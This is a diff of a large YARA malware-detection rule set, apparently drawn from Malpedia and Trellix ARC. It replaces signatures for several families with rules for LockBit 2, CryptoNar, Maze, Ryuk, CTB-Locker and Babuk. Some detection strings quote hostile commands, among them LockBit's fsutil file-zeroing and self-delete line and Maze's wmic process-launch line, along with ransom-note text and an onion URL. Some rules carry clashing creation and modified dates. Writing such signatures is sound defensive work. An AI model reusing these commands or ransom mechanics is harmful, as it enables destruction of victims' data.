+		id = "60972f0d-5b32-562d-b7a1-4042f30f34cb"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnwipe"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dnwipe_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stresspaint_auto.yar#L1-L150"
 		license_url = "N/A"
-		logic_hash = "a0d87818c953765cbf35eb3a0b4d4fff142998a549a84312b85c4d079e960955"
+		logic_hash = "d56631be02335c29e6f4a5ef8e07a5da331d1e0c248639e3a06714253e875bf3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -148245,25 +148186,31 @@ rule MALPEDIA_Win_Dnwipe_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 1306 16 1307 2b22 1106 }
-		$sequence_1 = { 00 2b37 00 7e01000004 281c00000a 720f000070 }
-		$sequence_2 = { 00 00 2b37 00 }
-		$sequence_3 = { 58 0d 09 07 8e 69 fe04 }
-		$sequence_4 = { 281b00000a 00 00 00 de04 }
-		$sequence_5 = { 110c 9a 6f2400000a 7285000070 6f2900000a 3a01010000 110a }
-		$sequence_6 = { 00 2b09 00 17 }
-		$sequence_7 = { 09 1304 16 1305 2b74 }
-		$sequence_8 = { 8e 69 3284 00 de05 26 }
-		$sequence_9 = { 09 9a 732200000a 1304 07 09 9a }
+		$sequence_0 = { 8d542478 51 52 e8???????? 8b44244c }
+		$sequence_1 = { 8d542478 c6042b00 3bda 7505 }
+		$sequence_2 = { 0103 014510 294514 83665800 }
+		$sequence_3 = { 0106 83560400 837d1c00 7494 }
+		$sequence_4 = { 0103 014510 294674 8b4674 }
+		$sequence_5 = { 8d542901 52 6a1e 56 }
+		$sequence_6 = { 0107 115f04 3bcb 7508 }
+		$sequence_7 = { 8d542478 52 57 e8???????? 83c408 }
+		$sequence_8 = { 8d542478 f3ab 8b8c24a4000000 8b8424a0000000 }
+		$sequence_9 = { 0107 83570400 85c9 7508 }
+		$sequence_10 = { 8d542478 898c2498010000 8d8c2494010000 52 }
+		$sequence_11 = { 010b 8945fc 8bc2 83530400 }
+		$sequence_12 = { 0103 ebaa 8b442408 56 }
+		$sequence_13 = { 8d542474 51 55 52 8bce e8???????? }
+		$sequence_14 = { 0108 8b8e44010000 114804 8b4f18 }
+		$sequence_15 = { 8d542901 52 6a1f 56 }
 
 	condition:
-		7 of them and filesize < 50176
+		7 of them and filesize < 1155072
 }
 /*
  * YARA Rule Set
  * Repository Name: Trellix ARC
  * Repository: https://github.com/advanced-threat-research/Yara-Rules/
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: 1919562a59f190bda60c982424f6a24c542ee3e0
  * Number of Rules: 163
  * Skipped: 0 (age), 4 (quality), 0 (score), 0 (importance)
@@ -148533,2409 +148480,2643 @@ private rule TRELLIX_ARC_Ransom_Xinof_Chunk_PRIVATE : RANSOMWARE
 	condition:
 		any of them
 }
-rule TRELLIX_ARC_Kelihos_Botnet_Pdb : BOTNET FILE
+rule TRELLIX_ARC_Lockbit2_Jul21 : FILE
 {
 	meta:
-		description = "Rule to detect Kelihos malware based on PDB"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "2b6683a1-ba19-586b-8a92-89d4764efa12"
-		date = "2013-09-04"
-		modified = "2020-08-14"
-		reference = "https://www.malwaretech.com/2017/04/the-kelihos-botnet.html"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_kelhios_botnet_pdb.yar#L1-L26"
+		description = "simple rule to detect latest Lockbit ransomware Jul 2021"
+		author = "CB @ ATR"
+		id = "22b423df-ae5c-5672-95be-333b13791fc6"
+		date = "2021-07-28"
+		modified = "2021-07-28"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Lockbit2.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "f0a6d09b5f6dbe93a4cf02e120a846073da2afb09604b7c9c12b2e162dfe7090"
-		logic_hash = "f60fb85161f86653f390b444d568da24cf07b3be99856230156741e8451e2a3f"
-		score = 75
+		logic_hash = "b3ed7d7c72b7585877293f586bae5ec7b0135b09d518b4e4b08f64e60db5a159"
+		score = 50
 		quality = 70
-		tags = "BOTNET, FILE"
-		rule_version = "v1"
-		malware_type = "botnet"
-		malware_family = "Botnet:W32/Kelihos"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
+		tags = "FILE"
+		version = "v1"
+		hash1 = "f32e9fb8b1ea73f0a71f3edaebb7f2b242e72d2a4826d6b2744ad3d830671202"
+		hash2 = "dd8fe3966ab4d2d6215c63b3ac7abf4673d9c19f2d9f35a6bf247922c642ec2d"
 
 	strings:
-		$pdb = "\\Only\\Must\\Not\\And.pdb"
-		$pdb1 = "\\To\\Access\\Do.pdb"
+		$seq1 = " /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 \"%s\" & Del /f /q \"%s\"" fullword wide
+		$seq2 = "\"C:\\Windows\\system32\\mshta.exe\" \"%s\"" fullword wide
+		$p1 = "C:\\windows\\system32\\%X%X%X.ico" fullword wide
+		$p2 = "\\??\\C:\\windows\\system32\\%X%X%X.ico" fullword wide
+		$p3 = "\\Registry\\Machine\\Software\\Classes\\Lockbit\\shell\\Open\\Command" fullword wide
+		$p4 = "use ToxID: 3085B89A0C515D2FB124D645906F5D3DA5CB97CEBEA975959AE4F95302A04E1D709C3C4AE9B7" fullword wide
+		$p5 = "https://tox.chat/download.html" fullword wide
+		$p6 = "Software\\Microsoft\\Windows NT\\CurrentVersion\\ICM\\Calibration" fullword wide
+		$p7 = "http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion" fullword wide
+		$p8 = "\\LockBit_Ransomware.hta" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1440KB and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $seq* ) and 4 of them ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Cyaxsharp_Rezer0 : LOADER
+rule TRELLIX_ARC_Cryptonar_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Detects CyaX-Sharp/ReZer0 loader samples based on the embedded scheduled task template"
-		author = "Max 'Libra' Kersten for McAfee's Advanced Threat Research Team"
-		id = "7a1addcf-4e8f-5290-8788-9b0738128160"
-		date = "2021-04-08"
-		modified = "2021-08-04"
-		reference = "This rule was published in combination with the following McAfee ATR blog: https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/see-ya-sharp-a-loaders-tale/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MAL_cyax_sharp_loader.yar#L1-L16"
+		description = "Rule to detect CryptoNar Ransomware"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "0911250f-fc1f-58bc-ac09-d77d2a2ed3ce"
+		date = "2026-03-01"
+		modified = "2020-08-14"
+		reference = "https://www.bleepingcomputer.com/news/security/cryptonar-ransomware-discovered-and-quickly-decrypted/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_CryptoNar.yar#L1-L36"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "3d6daaf7a85a9b3898e4ce5d5293b09f26965f9f7280b34ba8f6814b7f14dec2"
+		logic_hash = "04c1c4f45ad3552aa0876c3b645c6ca92493018f7fdc5d9d9ed26cf67199d21b"
 		score = 75
 		quality = 70
-		tags = "LOADER"
-		version = "1.0"
-		malware_type = "loader"
+		tags = "RANSOMWARE, FILE"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/CryptoNar"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$template = { 01A10C3C3F786D6C2076657273696F6E3D22312E302220656E636F64696E673D225554462D3136223F3E0D0A3C5461736B2076657273696F6E3D22312E322220786D6C6E733D22687474703A2F2F736368656D61732E6D6963726F736F66742E636F6D2F77696E646F77732F323030342F30322F6D69742F7461736B223E0D0A20203C526567697374726174696F6E496E666F3E0D0A202020203C446174653E323031342D31302D32355431343A32373A34342E383932393032373C2F446174653E0D0A202020203C417574686F723E5B5553455249445D3C2F417574686F723E0D0A20203C2F526567697374726174696F6E496E666F3E0D0A20203C54726967676572733E0D0A202020203C4C6F676F6E547269676765723E0D0A2020202020203C456E61626C65643E747275653C2F456E61626C65643E0D0A2020202020203C5573657249643E5B5553455249445D3C2F5573657249643E0D0A202020203C2F4C6F676F6E547269676765723E0D0A202020203C526567697374726174696F6E547269676765723E0D0A2020202020203C456E61626C65643E66616C73653C2F456E61626C65643E0D0A202020203C2F526567697374726174696F6E547269676765723E0D0A20203C2F54726967676572733E0D0A20203C5072696E636970616C733E0D0A202020203C5072696E636970616C2069643D22417574686F72223E0D0A2020202020203C5573657249643E5B5553455249445D3C2F5573657249643E0D0A2020202020203C4C6F676F6E547970653E496E746572616374697665546F6B656E3C2F4C6F676F6E547970653E0D0A2020202020203C52756E4C6576656C3E4C6561737450726976696C6567653C2F52756E4C6576656C3E0D0A202020203C2F5072696E636970616C3E0D0A20203C2F5072696E636970616C733E0D0A20203C53657474696E67733E0D0A202020203C4D756C7469706C65496E7374616E636573506F6C6963793E53746F704578697374696E673C2F4D756C7469706C65496E7374616E636573506F6C6963793E0D0A202020203C446973616C6C6F77537461727449664F6E4261747465726965733E66616C73653C2F446973616C6C6F77537461727449664F6E4261747465726965733E0D0A202020203C53746F704966476F696E674F6E4261747465726965733E747275653C2F53746F704966476F696E674F6E4261747465726965733E0D0A202020203C416C6C6F77486172645465726D696E6174653E66616C73653C2F416C6C6F77486172645465726D696E6174653E0D0A202020203C53746172745768656E417661696C61626C653E747275653C2F53746172745768656E417661696C61626C653E0D0A202020203C52756E4F6E6C7949664E6574776F726B417661696C61626C653E66616C73653C2F52756E4F6E6C7949664E6574776F726B417661696C61626C653E0D0A202020203C49646C6553657474696E67733E0D0A2020202020203C53746F704F6E49646C65456E643E747275653C2F53746F704F6E49646C65456E643E0D0A2020202020203C526573746172744F6E49646C653E66616C73653C2F526573746172744F6E49646C653E0D0A202020203C2F49646C6553657474696E67733E0D0A202020203C416C6C6F7753746172744F6E44656D616E643E747275653C2F416C6C6F7753746172744F6E44656D616E643E0D0A202020203C456E61626C65643E747275653C2F456E61626C65643E0D0A202020203C48696464656E3E66616C73653C2F48696464656E3E0D0A202020203C52756E4F6E6C79496649646C653E66616C73653C2F52756E4F6E6C79496649646C653E0D0A202020203C57616B65546F52756E3E66616C73653C2F57616B65546F52756E3E0D0A202020203C457865637574696F6E54696D654C696D69743E505430533C2F457865637574696F6E54696D654C696D69743E0D0A202020203C5072696F726974793E373C2F5072696F726974793E0D0A20203C2F53657474696E67733E0D0A20203C416374696F6E7320436F6E746578743D22417574686F72223E0D0A202020203C457865633E0D0A2020202020203C436F6D6D616E643E5B4C4F434154494F4E5D3C2F436F6D6D616E643E0D0A202020203C2F457865633E0D0A20203C2F416374696F6E733E0D0A3C2F5461736B3E }
+		$s1 = "C:\\narnar\\CryptoNar\\CryptoNarDecryptor\\obj\\Debug\\CryptoNar.pdb" fullword ascii
+		$s2 = "CryptoNarDecryptor.exe" fullword wide
+		$s3 = "server will eliminate the key after 72 hours since its generation (since the moment your computer was infected). Once this has " fullword ascii
+		$s4 = "Do not delete this file, else the decryption process will be broken" fullword wide
+		$s5 = "key you received, and wait until the decryption process is done." fullword ascii
+		$s6 = "In order to receive your decryption key, you will have to pay $200 in bitcoins to this bitcoin address: [bitcoin address]" fullword ascii
+		$s7 = "Decryption process failed" fullword wide
+		$s8 = "CryptoNarDecryptor.KeyValidationWindow.resources" fullword ascii
+		$s9 = "Important note: Removing CryptoNar will not restore access to your encrypted files." fullword ascii
+		$s10 = "johnsmith987654@tutanota.com" fullword wide
+		$s11 = "Decryption process will start soon" fullword wide
+		$s12 = "CryptoNarDecryptor.DecryptionProgressBarForm.resources" fullword ascii
+		$s13 = "DecryptionProcessProgressBar" fullword wide
+		$s14 = "CryptoNarDecryptor.Properties.Resources.resources" fullword ascii
 
 	condition:
-		$template
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB ) and all of them
 }
-rule TRELLIX_ARC_Masslogger_Stealer : STEALER FILE
+rule TRELLIX_ARC_Ransom_Maze : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect unpacked MassLogger stealer"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "c3a40108-3f0c-5949-9201-95c3c38b352a"
-		date = "2020-07-02"
-		modified = "2020-08-14"
-		reference = "https://urlhaus.abuse.ch/browse/signature/MassLogger/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_masslogger_stealer.yar#L1-L63"
+		description = "Detecting MAZE Ransomware"
+		author = "McAfee ATR"
+		id = "098a93c4-9aab-5563-af17-7aa91b056f64"
+		date = "2020-04-19"
+		modified = "2020-10-12"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/Ransom_Maze.yar#L1-L39"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "343873155b6950386f7d9bcd8d2b2e81088521aedf8ff1333d20229426d8145c"
-		logic_hash = "476b3f3a54a4616058a2aef01adbe429a38eacc8ee58881d31bd28e795a27575"
+		hash = "5badaf28bde6dcf77448b919e2290f95cd8d4e709ef2d699aae21f7bae68a76c"
+		logic_hash = "fc16475fbc2a2acf5d053ded4d2ec4126c6d6dcac3a6eafadcd6c61419dd7594"
 		score = 75
-		quality = 66
-		tags = "STEALER, FILE"
+		quality = 68
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "stealer"
-		malware_family = "Stealer:W32/MassLogger"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Maze"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pattern_0 = { 6437 3e2585829c88 ec ec 1bc8 }
-		$pattern_1 = { d7 b9513e1ba7 195ab6 e6df 7e2a 5a b6cc }
-		$pattern_2 = { 80aee281aae280 8ee2 808ce2808ee2808e e280 ae 00436f 6e }
-		$pattern_3 = { 6d e586 4c 40 }
-		$pattern_4 = { e281 ab e280 8ee2 80aee281aae280 8ee2 }
-		$pattern_5 = { 6c 69636b65644576 656e 7441 7267 7300 }
-		$pattern_6 = { 6e 7e81 d86aaf 61 93 7c2b 832b62 }
-		$pattern_7 = { 8b1c87 e7ed 24a2 3218 73df 53 }
-		$pattern_8 = { ee 9a357f9a475399 3188eef97d50 3f ef c9 }
-		$pattern_9 = { 44 a2???????? 92 7526 42 208fb5ca7050 }
-		$pattern_10 = { f2bbafb0d5f8 d524 0d48c906ba 7977 5d }
-		$pattern_11 = { 748f 46 4e 49 2af2 ee 9a357f9a475399 }
-		$pattern_12 = { 237ddb e200 95 46 99 37 }
-		$pattern_13 = { d9ae1d19ec3b 01db c5615c ec }
-		$pattern_14 = { 304a8a e2f4 bde7a84f79 c038d3 197ceae6 }
-		$pattern_15 = { 291f ff84c3bd55d8dc f331f2 1a3a 9c 7d78 }
-		$pattern_16 = { 3f 7af1 77a2 24ae 7ff3 }
-		$pattern_17 = { d1655d 7236 3873c1 b59e }
-		$pattern_18 = { 2aff 95 55 28ff 94 53 }
-		$pattern_19 = { e6b1 43 08d2 ef 43 3c38 }
-		$pattern_20 = { 6964427275736800 43 6f 6c 6f 7200 e281 }
-		$pattern_21 = { 37 005400a7 877f08 54 00e1 875303 5c }
-		$pattern_22 = { 6a45 e42c d3ba76c4f058 ce 3037 }
-		$pattern_23 = { b59e 59 f1 f1 }
-		$pattern_24 = { 7988 cd09 91 0099664e0391 008288490061 008c88d3099900 }
-		$pattern_25 = { 1e e3c2 00ff 698876be8fb365b13eb7 45 }
-		$pattern_26 = { 3d4c9deadf 57 ddeb 97 }
-		$pattern_27 = { e280 8ee2 808ee281aee280 8ee2 81ace281ace280ade280ab e281 }
-		$pattern_28 = { 4d 9c 8e5753 32414f d28a7173e2c4 7ee4 d9ae1d19ec3b }
-		$pattern_29 = { 7472 69704d656e755f 53 61 }
-		$pattern_30 = { 79bc fa ad 49 }
-		$pattern_31 = { 875303 5c 00140a 37 005c00a7 }
-		$pattern_32 = { 7265 5f 43 6c 69636b00746f6f 6c 53 }
-		$pattern_33 = { 36e633 2b2b 3673d1 d480 124d2d }
-		$pattern_34 = { 19b3e7ab29db 51 e1f3 dd3a 266f b884c4b53b }
-		$pattern_35 = { 7467 43 f332d2 84bf3df2e66b 4a ba5a20d9f5 3dbf2a3753 }
-		$pattern_36 = { f271f3 8877f7 a8e5 6437 3e2585829c88 }
-		$pattern_37 = { ce 84604c 3f 8cc6 56 bf165fdec5 4a }
-		$pattern_38 = { ad 49 a2???????? 4c e15b 8b1c87 }
-		$pattern_39 = { 3400 b687 bc083c00cd 87ce 083400 }
+		$x1 = "process call create \"cmd /c start %s\"" fullword wide
+		$s1 = "%spagefile.sys" fullword wide
+		$s2 = "%sswapfile.sys" fullword wide
+		$s3 = "%shiberfil.sys" fullword wide
+		$s4 = "\\wbem\\wmic.exe" fullword wide
+		$s5 = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" fullword ascii
+		$s6 = "NO MUTEX | " fullword wide
+		$s7 = "--nomutex" fullword wide
+		$s8 = ".Logging enabled | Maze" fullword wide
+		$s9 = "DECRYPT-FILES.txt" fullword wide
+		$op0 = { 85 db 0f 85 07 ff ff ff 31 c0 44 44 44 44 5e 5f }
+		$op1 = { 66 90 89 df 39 ef 89 fb 0f 85 64 ff ff ff eb 5a }
+		$op2 = { 56 e8 34 ca ff ff 83 c4 08 55 e8 0b ca ff ff 83 }
 
 	condition:
-		7 of them and filesize < 3834880
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) and 4 of them ) and all of ( $op* ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Nionspy : FILEINFECTOR FILE
+rule TRELLIX_ARC_Ryuk_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Triggers on old and new variants of W32/NionSpy file infector"
-		author = "Trellix ARC Team"
-		id = "86051ef8-a18b-553c-b06c-490f8d6df5cf"
-		date = "2026-02-01"
-		modified = "2020-08-14"
-		reference = "https://blogs.mcafee.com/mcafee-labs/taking-a-close-look-at-data-stealing-nionspy-file-infector"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_NionSpy.yar#L1-L25"
+		description = "Ryuk Ransomware hunting rule"
+		author = "Christiaan Beek - McAfee ATR team"
+		id = "d3e67e26-3b34-5c28-a1c0-c4aeacd49df9"
+		date = "2019-04-25"
+		modified = "2021-07-12"
+		reference = "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Ryuk.yar#L1-L47"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "982ba52f39352aee9e2d2dcadfb0816c439e92d0e5947afa7860630720913742"
-		score = 75
+		logic_hash = "43c0be708fa8a388dce6e1dd721e24329b5b08a942d99e9b2631c90155790c4b"
+		score = 50
 		quality = 70
-		tags = "FILEINFECTOR, FILE"
-		malware_type = "fileinfector"
-		malware_family = "FileInfector:W32/NionSpy"
+		tags = "RANSOMWARE, FILE"
+		rule_version = "v2"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Ryuk"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$variant2015_infmarker = "aCfG92KXpcSo4Y94BnUrFmnNk27EhW6CqP5EnT"
-		$variant2013_infmarker = "ad6af8bd5835d19cc7fdc4c62fdf02a1"
-		$variant2013_string = "%s?cstorage=shell&comp=%s"
+		$x1 = "C:\\Windows\\System32\\cmd.exe" fullword ascii
+		$x2 = "\\System32\\cmd.exe" fullword wide
+		$s1 = "C:\\Users\\Admin\\Documents\\Visual Studio 2015\\Projects\\ConsoleApplication54new crypted" ascii
+		$s2 = "fg4tgf4f3.dll" fullword wide
+		$s3 = "lsaas.exe" fullword wide
+		$s4 = "\\Documents and Settings\\Default User\\sys" fullword wide
+		$s5 = "\\Documents and Settings\\Default User\\finish" fullword wide
+		$s6 = "\\users\\Public\\sys" fullword wide
+		$s7 = "\\users\\Public\\finish" fullword wide
+		$s8 = "You will receive btc address for payment in the reply letter" fullword ascii
+		$s9 = "hrmlog" fullword wide
+		$s10 = "No system is safe" fullword ascii
+		$s11 = "keystorage2" fullword wide
+		$s12 = "klnagent" fullword wide
+		$s13 = "sqbcoreservice" fullword wide
+		$s14 = "tbirdconfig" fullword wide
+		$s15 = "taskkill" fullword wide
+		$op0 = { 8b 40 10 89 44 24 34 c7 84 24 c4 }
+		$op1 = { c7 44 24 34 00 40 00 00 c7 44 24 38 01 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and 1 of ( $variant* )
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) and 4 of them ) and all of ( $op* ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Malw_Medfos : TROJAN FILE
+rule TRELLIX_ARC_RANSOM_RYUK_May2021 : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Medfos trojan based on PDB"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "07ad0227-ca8f-5071-8ef7-8c3e087fcc35"
-		date = "2013-04-19"
-		modified = "2020-08-14"
-		reference = "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=win32%2Fmedfos"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_medfos_pdb.yar#L1-L25"
+		description = "Rule to detect latest May 2021 compiled Ryuk variant"
+		author = "Marc Elias | McAfee ATR Team"
+		id = "6e415a9e-7373-50a8-ad57-f95220faed9c"
+		date = "2021-05-21"
+		modified = "2021-07-12"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Ryuk.yar#L91-L113"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "3582e242f62598445ca297c389cae532613afccf48b16e9c1dcf1bfedaa6e14f"
-		logic_hash = "1726462a806f5cb3f0b80596623cebc51a7a9f866ded0cb59ea1c43034ce2819"
-		score = 75
+		hash = "8f368b029a3a5517cb133529274834585d087a2d3a5875d03ea38e5774019c8a"
+		logic_hash = "b379c1182e60ce8c777668386d8cbd08350dd2363770dec56502bf44aaf5d7f6"
+		score = 50
 		quality = 70
-		tags = "TROJAN, FILE"
-		rule_version = "v1"
-		malware_type = "trojan"
-		malware_family = "Trojan:W32/Medfos"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
+		tags = "RANSOMWARE, FILE"
+		version = "0.1"
 
 	strings:
-		$pdb = "\\som\\bytguqne\\jzexsaf\\gyin.pdb"
+		$ryuk_filemarker = "RYUKTM" fullword wide ascii
+		$sleep_constants = { 68 F0 49 02 00 FF (15|D1) [0-4] 68 ?? ?? ?? ?? 6A 01 }
+		$icmp_echo_constants = { 68 A4 06 00 00 6A 44 8D [1-6] 5? 6A 00 6A 20 [5-20] FF 15 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and any of them
+		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 200KB and ( $ryuk_filemarker or ( $sleep_constants and $icmp_echo_constants ) )
 }
-rule TRELLIX_ARC_Backdoor_Kankan_Pdb : BACKDOOR FILE
+rule TRELLIX_ARC_Backdoorfckg : CTB_LOCKER_RANSOMWARE RANSOMWARE
 {
 	meta:
-		description = "Rule to detect kankan PDB"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "6910ecc7-3c31-569b-a7ff-2dcbccff88f9"
-		date = "2013-08-01"
+		description = "CTB_Locker"
+		author = "ISG"
+		id = "2a00551d-1f80-5991-9416-d9b1b39db8e9"
+		date = "2015-01-20"
 		modified = "2020-08-14"
-		reference = "https://threatpoint.checkpoint.com/ThreatPortal/threat?threatType=malwarefamily&threatId=650"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_backdoor_kankan_pdb.yar#L1-L27"
+		reference = "https://blogs.mcafee.com/mcafee-labs/rise-backdoor-fckq-ctb-locker"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_CTBLocker.yar#L1-L26"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "73f9e28d2616ee990762ab8e0a280d513f499a5ab2cae9f8cf467701f810b98a"
-		logic_hash = "3d2e45631dfca0e76e98eee4bb5c4ce1631906f497c052d8c41cc37637cb2760"
+		logic_hash = "a334b07053db66aa0fb2d2b2ca7f94c480509041724ddd4dd1708052d75baffb"
 		score = 75
-		quality = 70
-		tags = "BACKDOOR, FILE"
+		quality = 20
+		tags = "CTB_LOCKER_RANSOMWARE, RANSOMWARE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Kankan"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/CTBLocker"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\Projects\\OfficeAddin\\INPEnhSvc\\Release\\INPEnhSvc.pdb"
-		$pdb1 = "\\Projects\\OfficeAddin\\OfficeAddin\\Release\\INPEn.pdb"
-		$pdb2 = "\\Projects\\OfficeAddinXJ\\VOCEnhUD\\Release\\VOCEnhUD.pdb"
+		$string0 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+		$stringl = "RNDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+		$string2 = "keme132.DLL"
+		$string3 = "klospad.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and any of them
+		3 of them
 }
-rule TRELLIX_ARC_Msworldexploit_Builder_Doc : MALDOC FILE
+rule TRELLIX_ARC_RANSOM_Babuk_Packed_Feb2021 : RANSOM T1027_005 T1027 T1083 T1082 T1059 T1129 FILE
 {
 	meta:
-		description = "Rule to detect RTF/Docs files created by MsWordExploit Builder"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "6c4c091b-5fce-583a-bc17-31830251892c"
-		date = "2026-02-01"
-		modified = "2020-08-14"
+		description = "Rule to detect Babuk Locker packed"
+		author = "McAfee ATR"
+		id = "f5f3a3a6-2531-56c4-9153-b698c7bdc3d3"
+		date = "2021-02-19"
+		modified = "2021-02-24"
 		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_MsWordExploit_DOC.yar#L1-L24"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Babuk_Packed_Feb2021.yar#L1-L30"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "f85c6d79e5ed20084d35f9de92a9d9ce20cf4b3100b1226d64147e366934585d"
+		hash = "48e0f7d87fe74a2b61c74f0d32e6a8a5"
+		logic_hash = "f3312b9c9147e9f892dbfb329cb95d3ee3ae67eefeec2d089b8c89fd26531953"
 		score = 75
-		quality = 68
-		tags = "MALDOC, FILE"
-		malware_type = "maldoc"
-		malware_family = "Maldoc:W32/MSwordExploit"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
+		quality = 70
+		tags = "RANSOM, T1027.005, T1027, T1083, T1082, T1059, T1129, FILE"
+		rule_version = "v1"
+		malware_family = "Ransom:Win/Babuk"
+		malware_type = "Ransom"
+		mitre_attack = "T1027.005, T1027, T1083, T1082, T1059, T1129"
 
 	strings:
-		$s1 = { 68 74 74 70 3A 2F 2F 61 70 69 2E 6D 73 77 6F 72 64 65 78 70 6C 6F 69 74 2E 63 6F 6D }
-		$s2 = "{\\*\\generator mswordexploit 6.3.9600}" fullword ascii
